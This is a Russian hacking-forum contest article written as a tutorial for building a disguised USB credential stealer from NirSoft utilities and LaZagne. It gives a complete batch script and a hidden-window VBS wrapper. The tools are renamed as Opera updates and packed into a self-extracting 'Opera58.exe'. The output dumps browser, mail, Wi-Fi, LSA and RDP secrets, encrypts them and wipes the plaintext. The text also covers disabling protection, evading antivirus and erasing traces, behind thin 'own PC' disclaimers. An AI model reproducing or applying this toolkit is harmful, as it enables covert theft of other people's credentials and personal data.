Конкурс [Угнать за 50с.] Форк "система сбора секретных данных от am29f010b"

"Статья для участия в конкурсе Конкурс 2018 года - авторская статья по любой тематике нашего форума! "

«Цифра поработила человека, сделала зависимым.
И именно Цифра освободит человека!
Позволит преодолеть себя.
Позволит подняться очень высоко.
Выше неба! Выше звезд!
Власть Цифры сменится властью над Цифрой.
И двоичный код станет символом нашей свободы!»
(В. Панов «Московские анклавы»)

[ .]

Главная.png


Всем привет! Мои поздравления с ННГ!

Публикую новогодний Tutorial - релевантный hack_man в жанре киберпанк по созданию прокачанного стиллера «гибридной системы сбора данных». Агрессивный/надежный/проверенный годами и простой с технической точки зрения «комбайн восстановления учёток/секретных данных».

Стиллер говорите? Predator the thief? Сборщик паролей «Pony»? Fastir_Collector? Да, аналогичного ПО (особенно для ОС семейства Windows) существует немало вариаций. Но некоторые подобного рода проги (IMHO) обладают и недостатками: компромат; отсутствие шифрования (да, есть и такие); shareware; заброшенный проект; баги; GUI, а нужен тихий режим; или попросту морально устаревший софт. Но хуже всего обстоят дела, если в crafty software имеются бэкдоры.
Подобное ПО описанное выше, конечно же имеет право быть в арсенале у каждого Амиго... (вопрос веры/умения и здесь он не рассматривается).

Звучит вроде бы пафосно, но я подписываюсь под каждым словом в статье (это моё субъективное мнение) и собираюсь подкрепить «Уровень» заявленными подробностями ниже.

В статье продемонстрирую принцип работы софт-форка по восстановлению забытых «паролей» (логины/пароли/перс.данные) со своего ПК. Ключевое слово «СВОЕГО», как только флешка используется на чужой машине, в дверь могут постучаться очень настойчивые ребята с мешком, но отнюдь не Дед мороз со своей Снегурочкой.

Предполагаю, что статья зайдёт коллекционерам стиллеров, однако стоит напомнить в очередной раз, что свобода дороже!
Пожалуйста помните об ответственности, которая распространяется на обладателя/действия подобного рода программ! Как только оступитесь и подумаете «о чём-то таком» из шкафа тут же выпрыгнут...
Статья написана в ознакомительных целях, автор не несёт никакой ответственности за ваши помыслы и действия.


Преимущества, которыми обладает «собранный форк», некоторые демонстрируется на видео.
  • Автономность. Отсутствие каких-либо зависимостей/действий. Все что необходимо сделать, чтобы собирать/напоминать нам горсти НАШИХ секретов - вставить флэшку в машину с ОС Windows, запустить exe-шник, ввести мастер-пароль и ждать праздника. Всё.
  • Тихий режим. На видео специально показана работа командной строки (и жирные дядьки с пивом), которую легко скрыть (ниже я покажу как), но невозможно скрыть вульгарные действия скрытых процессов, порожденные «бурей», например в .
  • Поддержка ОС Windows XP/10.
  • Правдоподобное отрицание наличие самого ПО (криптостойкое шифрование самого форка и собранных данных, ПО не подлежит декомпиляции).
  • В пассивном режиме «никогда» не будет детектироваться ни одним антивирусом.
  • Отсутствие следов деятельности на HDD/USB (по окончанию сбора данных, не остается никаких следов на жестком/флэш диске или в журналах ОС, и нет возможности восстановления каких-либо конфиденциальных/компрометирующих материалов). Можно «потерять» флэш-накопитель, не опасаясь за тех, кто его найдет, за собранную информацию и за свою за…цу.
  • Внушающий захват данных – не иначе, как Малыш Нельсон вернулся со своим дыроделом, для того чтобы ограбить и выбить дух из ПК с ОС Windows. Этичнее это звучит примерно так – максимальный сбор конфиденциальной информации со своей машины.
  • КПД ↑ и простота реализации идеи (я не шучу. Чем сложнее софт, тем сложнее система и тем труднее обеспечить её надёжность - это элементарная математическая теория вероятности). Реализовать задумку сможет «любой Амиго» без особых технических навыков, но у которого пригорает из-за СВОИХ забытых паролей/секретов на СВОЕМ ПК.
  • Схема, проверенная временем.
Нейтральное преобладание:
  • Основной код (тело софта) основано на либеральных лицензиях, обертка – shareware (по факту на законных основаниях - обертка freeware).
Недостатки предложенной идеи:
  • время работы софта в районе 1 минуты;
  • временное присутствие следов сбора данных в ОЗУ ([VBS] FreeMem=Space(X) – вариант ненадёжный);
  • в активной фазе жатвы урожая, необходимо отключать проактивную защиту на ПК;
  • нет возможности выудить пароли из Яндекс-браузера (такая возможность периодически появляется, но в скором времени исчезает), но всё же «кое-что» из ЯБ - ловится «всегда»; аналогично и со Скайпом.
  • сбор логов не отправляется на какой-либо веб сервер.
  • физический доступ к ПК с привилегиями администратора.
Преимущества и недостатки познаются в сравнении, двигаемся дальше.


┌──Жатва урожая. Что умеет собирать, наш будучи-собранный комбайн:
├──╼ Логины/пароли учёток из последних версий браузеров: Opera; Firefox; M.Edge/IE; Chrome (в том числе, сбор паролей из браузера Firefox за защитой мастер-паролем - жалкая преграда).
├──╼ Учетки из некоторых клиентов: FTP; Filezilla; Яндекс диск (Webdav проводника); vpn-соединений, OpenSSH, Putty, RDP.
├──╼ Пароли секретных хранилищ LSA; LM/NT; сисадминский пароль; пароль домашней сети (pass - домашней группы); пароли сохранённых wifi-соединений/точек.
├──╼ Учетки почтовых клиентов Outlook; Thunderbird.
├──╼ Product ID/KEY: ключи ОС Windows; MS Office; Visual Studio; SQL Server.
├──╼ Веб-историю «Всех» браузеров (ссылка и ее длина, время визита на сайт, название посещенного ресурса, браузер и его версия).
├──╼ Локальную историю действий пользователей за все время существования Windows на ПК по дате и времени (открытие папок/файлов; выход_в_сеть; вкл-выкл-ребут-сон-продолжительность_работы_ПК; Install-uninstall_Software).
├──╼ Дамп и анализ планировщика заданий.
├──╼ Сбор имен инсталлированного ПО и расширенный его анализ.
├──╼ Некоторые учетки непопулярных мессенджеров.
└──╼ Удобочитаемые отчеты.


am29f010b, и при поддержке авторов статей конкурс от codeby.net пикчерз представляют: тихий блокбастер
Рита Север не была звездным ломщиком, не входила в элиту машинистов, и о ней не рассказывали длинные байки в профильных барах. В послужном списке Север не числилось громких побед, виртуозных взломов, приводящих к разорению корпораций и государственным кризисам. Она не была столь знаменита, как Каскад, Арлекин или Чайка. Ну и что из этого? Где теперь Каскад? Где Арлекин? Где Чайка? В том-то и дело, что никто не знал где.

…Московский клуб…В.Панов

Идея: объединить разные (freeware) сборщики учетных данных; зашифровать тело/стандартный вывод потока данных, и автоматизировать процесс работы форка и его логирования; «замести следы».


Инструменты, которые понадобятся в ходе создания пака
  • ПК с ОС Windows.
  • Архиватор RAR портативная версия.
  • Софт Кудесника – Nirsoft.
  • Софт LaZagne и его патч.

Пройдемся по пунктам: «какая закуска; сколько спиртного; какое вино»

ПК с ОС Windows 7/10 (32/64).
На время «возвращения Малыша Нельсона» отключаем проактивную защиту.


Архиватор
Необходим 32 разрядной версии архиватор RAR, чтобы гарантированно работал на всех наших ПК. RAR – отличается своей криптостойкостью хеша к типам атак брутфорса/радужных таблиц (дайте мне знать, если вам нужен более развёрнутый ответ «на сколько всё устойчиво»).

Скачиваем пробную RU-версию архиватора с .
  • Создаём на флэшке каталог ~\Opera\Opera\Opera.
  • Инсталлируем RAR на флэшку в ~\Opera\Opera\Opera\winrar.
  • Создаем в каталоге файл ~\Opera\Opera\Opera\winrar\winrar.ini
  • С помощью блокнота наполняем winrar.ini
Код:
Global\AppData=0
Global\Integration=0
Global\SaveSettings=0

Готово! Теперь у нас на флэшке портативная версия Архиватора winrar.
Софт Winrar поставляется под коммерческой лицензией, но по истечению пробного периода, архиватор продолжит работать на законных основаниях и дальше. Неудобство будет заключаться, во всплывающем окне с просьбой "приобрести активацию, если в этом есть такая необходимость"
  • Активацию архиватора вы можете приобрести за 29$ (я почти уверен, что это не требуется большинству порядочным юзерам).
  • Не приобретать лицензию (просто закрывать всплывающее окно о приобретении лицензии при работе с winrar).
  • Или короче, многие сами знают, где лицензию «взять» – это файл активации «rarreg.key».

Nirsoft
Любопытная тема: нам понадобятся хакерские инструменты с поддержкой командной строки от Кудесника. Вот только давление безов вынудило его на активные действия: на рокировку в длинную сторону. Разработчик выпилил функционал командной строки, из нужных нам прог, но уничтожить свое полноценное творение не смог. По Волшебник сам нашел выход из «тупика» и для себя и для нас, короче, ушел в три нуля и выложил в сети нужный нам софт «отдельно» от своего сайта, сохранив свои авторские права и почтение перед серыми шляпами. Инструкция, где взять необходимые инструменты для выполнения поставленной задачи - .

Шаги, как заиметь сборник софта от Nirsoft с поддержкой командной строки (примечание - ниже цитата от автора):
  • Нажмите на эту для скачивания архива.
  • Введите «download» в качестве имени пользователя и «nirsoft123!» в качестве пароля.
  • После загрузки пакета извлеките из него файлы, используя следующий пароль: nirsoft123!

Но! Это только 1/3 софта с поддержкой cmd, который нам потребуется!
Забираем наши аддоны с сайта Nirsoft (32 разрядные версии программ, чтобы гарантированно работали и на нашей устаревшей тачке):
  1. ;
  2. расширенную ;
  3. прогу для ;
  4. прогу для ;
  5. локальный ;
  6. мини-локалный ;
  7. анализатор ;
  8. анализатор ;
  9. и .
«Последние» скачанные инструменты (2/3 от будущего форка) так же поддерживают режим cmd, но удовлетворяют «мировое господство» на предмет «no_hacktools» и живут на официальном сайте Мага-волшебника.
Однако всё же, о таком славном дополнении к cmd, как encryptedregview, который сканирует реестр и расшифровывает защищенным DPAPI секретные данные (пароли/лицензии коммерческого софта на ПК) – можно позабыть. Это теперь оконная прога, которая запускается отдельно от комбайна – если в ней есть такая необходимость.


LaZagne
Этот софт тащит учетные данные, что и софт Кудесника + разнообразие свыше. ПО друг друга взаимозаменяет и дополняет, ну прямо как «ГЛОНАСС и GPS» на наших гаджетах.
Первый лежачий полицейский: в последней v2.4 – критическая ошибка, не позволяющая отрабатывать скрипты на python-е, как минимум на Windows 10 Home. Модули, расширяющий функционал LaZagne, разрабатывают все, кто «в теме», а курирует проект один человек, который иногда ошибается. В LaZagne последней версии разработчик допустил ошибку. Поэтому исправление LaZagne с главной ветки проекта на -е, где исправлена ошибка. Разработчик в курсе этой ошибки, но медлит с фиксами (пытается разобраться в Python3).


Все необходимые инструменты собрали, проактивную защиту приглушили. В бой!


Приступаем к сборке "своего комбайна"

На флешке у нас уже создан каталог ~\Opera\Opera\Opera, в него инсталлирован архиватор winrar ~\Opera\Opera\Opera\winrar.
  • Объединяем все файлы: exe-шники (Nirsoft + LaZagne) в любом временном каталоге на HDD, например, «С:\Codeby».
  • Переименовываем все файлы по маске «цифра» (операцию: «групповое переименование файлов», например, легко проделать в Total Commander). Было ChromePass.exe стало UpdateOpera_patch1320.exe; LaZagne.exe - OperaStars.exe и тд. Эти действия «необходимы», как элемент из притчи о социальной инженерии и для простоты наглядности визуализации кода.
  • Пишем скрипт «Bobi_teri.bat»
Открываем блокнот и наполняем его следующим содержанием:
Код:
@echo OFF
start UpdateOpera_patch1320.exe /stext 20.txt
start UpdateOpera_patch1321.exe /stext 21.txt
start UpdateOpera_patch1322.exe /stext 22.txt
start UpdateOpera_patch1323.exe /stext 23.txt
start UpdateOpera_patch1324.exe /stext 24.txt
start UpdateOpera_patch1325.exe /stext 25.txt
start UpdateOpera_patch1326.exe /stext 26.txt
start UpdateOpera_patch1327.exe /stext 27.txt
start UpdateOpera_patch1328.exe /stext 28.txt
start UpdateOpera_patch1329.exe /stext 29.txt
start UpdateOpera_patch1330.exe /stext 30.txt
start UpdateOpera_patch1331.exe /stext 31.txt
start UpdateOpera_patch1332.exe /stext 32.txt
start UpdateOpera_patch1333.exe /stext 33.txt
start UpdateOpera_patch1334.exe /stext 34.txt
start UpdateOpera_patch1335.exe /stext 35.txt
start UpdateOpera_patch1336.exe /stext 36.txt
start UpdateOpera_patch1337.exe /stext 37.txt
start UpdateOpera_patch1338.exe /stext 38.txt
start UpdateOpera_patch1339.exe /stext 39.txt
OperaStars.exe all > \Opera\Opera\Opera\vremenno\Stars.txt
cd \Opera\Opera\Opera\winrar
rar a -m0 -hpCodeby -dw -ag -r -ep -idq help.rar \Opera\Opera\Opera\vremenno
exit

Пояснение по скрипту (разбор каждой строчки/флага).
#Изменение метки флэшки или буквы диска никак не повлияет на работу нашего форка, все сработает по-новогоднему - волшебно! (при работе проги на другой машине буква диска иногда меняется – no problem).
  1. @echo OFF # отключить вербализацию во время работы скрипта в cmd.
  2. start UpdateOpera_patch[Х].exe /stext [Y].txt # поочередное исполнение всех инструментов Кудесника (захват и анализ данных), сохранение логов в файлы.txt [20..39/Stars]. Для удобства, чтобы пользователь не запутался, код в статье приведен, как start UpdateOpera_patch1337.exe /stext 37.txt. При персональной сборке форка записывайте код [латиницей], как start UpdateOpera_patch1337.exe /stext Password_in-Browser.txt # и тп.
  3. OperaStars.exe all > \Opera\Opera\Opera\vremenno\Stars.txt # отработать все написанные на python-е скрипты LaZagne (скомпилированные в OperaStars.exe), и записать стандартный вывод награбленных и расшифрованных данных на флэшку в ~\Opera\Opera\Opera\vremenno\Stars.txt.
  4. cd \Opera\Opera\Opera\winrar # переход в каталог winrar, так как нам нужно будет шифровать/уничтожать полученные данные. Обратите внимание на прямые и обратные слэши в скрипте – это не ошибка.
  5. rar a -m0 -hpCodeby -dw -ag -r -ep -idq help.rar \Opera\Opera\Opera\vremenno # так как «мы находимся в каталоге программы архиватора winrar, то нам стала доступна cmd rar. Данная строка по скрипту завершает код, что даёт:
+ соберет все награбленные собранные учетные данные (продублирует тело ПО в стандартный поток вывода «vremenno» (на случай, если кто-то без разрешения сотрет форк с флэшки);
+ надёжно зашифрует все секреты (в том числе имена файлов);
+ поместит архив с уникальным именем в папку winrar на нашей флэшке;
+ уничтожит и затрёт захваченные в открытом виде данные (отработанные данные в открытом виде ПО Nirsoft-а и LaZagne в каталоге «vremenno»).

Используемые ключи rar:
a -m0
# режим архивирования без сжатия;
-hpCodeby # зашифровать данные и имена файлов паролем по умолчанию “Codeby”;
-dw # уничтожить/затереть файлы после архивации (удалить данные без возможности их восстановления);
-ag # к имени архива с данными добавляется суффикс/окончание «дата и время» (благодаря этому флагу архивы не будут друг друга перезаписывать при каждом новом сборе данных, визуально легко определить какой архив от какой машины);
-r # рекурсивное архивирование (без комментариев);
-ep # исключить пути из имен (данный архив не мусорка);
-idq # тихий режим rar (запрет вербализации в cmd);
help.rar # «корень/приставка» имени создаваемого архива с данными;
\Opera\Opera\Opera\vremenno # цель, сообщить архиватору с каким каталогом работать (шифрование/уничтожение данных).

Второй лежачий полицейский: данный скрипт предназначен для работы на ОС Windows, если «нечаянно» запустить форк на GNU/Linux, или прерватьугодить в цейтнот, прервав рабочую сессию - gun down в Windows, то каталог «vremenno» не удалится с флэшки. Можно подзабыть почистить за собой вручную (или «неправильно» удалить папку), и тогда кому-то, кому любопытно crafty software, может на глаза попасться интересное: «-hpCodeby». Можно защититься от такого поведения и изменить строку в скрипте:
rar a -m0 -hpCodeby -dw -ag -r -ep -idq help.rar \Opera\Opera\Opera\vremenno
на
rar a -m0 -p -dw -ag -r -ep -idq help.rar \Opera\Opera\Opera\vremenno # в таком случае, при работе форка на ОС Windows нужно будет вводить два различных пароля: один пароль - мастер пароль, другой пароль (по окончанию работы форка всплывет окно) - «любой pass» для открытия будучи-созданного архива help[ХY].rar. Минусы и плюсы такого решения становятся очевидными на практике.


После создания скрипта C:/Codeby/Bobi_teri.bat, собираем обертку.

1) Архивируем все файлы (Opera[XY].exe и Bobi_teri.bat) в самораспаковывающийся архив Opera58.exe.
Софт.jpg


арх.jpg


2) Скачиваем наш форк на флэшку в каталог ~\Opera\Opera\Opera\Opera58.exe.


Если требуется Тихий режим работы форка (скрыть полностью командную строку во время работы софта), тогда открываем блокнот наполняем его текстом
Код:
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("Bobi_teri.bat"), 0, True
Сохраняем его в C:\Codeby\Bobi_teri.vbs
И архивируем всё, как описано выше, см. скрин «». Но только «Выполнить после распаковки» заменяем Bobi_teri.bat на Bobi_teri.vbs (Bobi_teri.bat и Bobi_teri.vbs должны быть в одном архиве).

Софт по захвату персональных и секретных данных полностью готов, что за crufty software такой «Opera58.exe» никто не может знать (имена фанфар так же зашифрованы), короче говоря, форк и его дамп [exe] монолитные и имеют слабую корреляцию.

сбор данных.jpg

Скрин. Анализ данных после ввода пароля к зашифрованному дампу с уязвимой машины.


Выводы

Сама идея реализации форка классическая и проверенная временем, основана на трёх китах:
  • Объединить лучший софт.
  • Зашифровать тело и дамп «сборщика секретных данных»
  • «Замести следы».
И не стоит писать свой софт (не касается эксплойтов), ПРО технари его (мировой софт) уже давно обкатали.
И так, «любой Амиго» сможет создавать подобные «стиллеры» в корыстных целях, а не только для восстановления забытых паролей – плохо и не всегда наказуемо, а у хакера подобные игрушки с «пелёнок». Как защитится от подобных проделок злоумышленника при его физическом доступе к ПК? Ответ прост, для этого и существует защита от «paradise cracked», и к примеру, мое по нему, но это уже другая история - криптографии. И да, не слушайте тех, кто яростно доказывает никчемность полнодискового шифрования... Им ни история Сноудена, ни пример…, ни шпионаж, ни чего другое не аргумент.

p/s/ Пожалуйста не называйте, описанную выше тулзу (хотя я и обозвал её пару раз в статье «грабителем и пр.»),
Стиллер (с англ. языка "steal" - украсть) - определенный класс троянов (malware вирусов), функции которых полностью состоят из кражи сохраненных в системе паролей и отправки их мошеннику.
- это принципиально другой пак! Более солянистый и более легальный.

p/p/s/ С помощью, описанного в этой статье ПО, когда-то на одной из своих машин (сборка Windows 8 какая-то была) был обнаружен предустановленный и замаскированный (СИ) пароль в хранилище Windows для удаленного подключения к ПК (конечно это не работало, наверное - как задумывалось, но наличие самого факта...)

p/p/p/s/ Почему в статье я называю "Nirsoft" Магом и волшебником?
Потому что пользуюсь Nirsoft-ом, когда еще в сети Mr.Robot-а не крутили, и знаю о надежности софта (международный и мой вопрос веры:)).
Nir Sofer (в одиночку создавал портативные free-утилиты) посвятил себя цифре. Вот его созданный и признанный на мировом (у хакеров так же в почёте) уровне софт, который умеет "Брутить/Парсить/Снифить/Дампить..."

111111111.jpg

p/p/p/p/s/ А еще если сделать зум в браузере на форуме Кодебай, то круглые иконки пользователей становятся
скрин.png

На этом я с вами прощаюсь, чудесных выходных!
 
A

am29f010b

"Поговаривают" LaZagne поправили в новом выпуске, сущесвенно особо (все/исправления в патче были) ничего не пришло. но теперь можно собирать теперь форк с закрытыми глазами.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!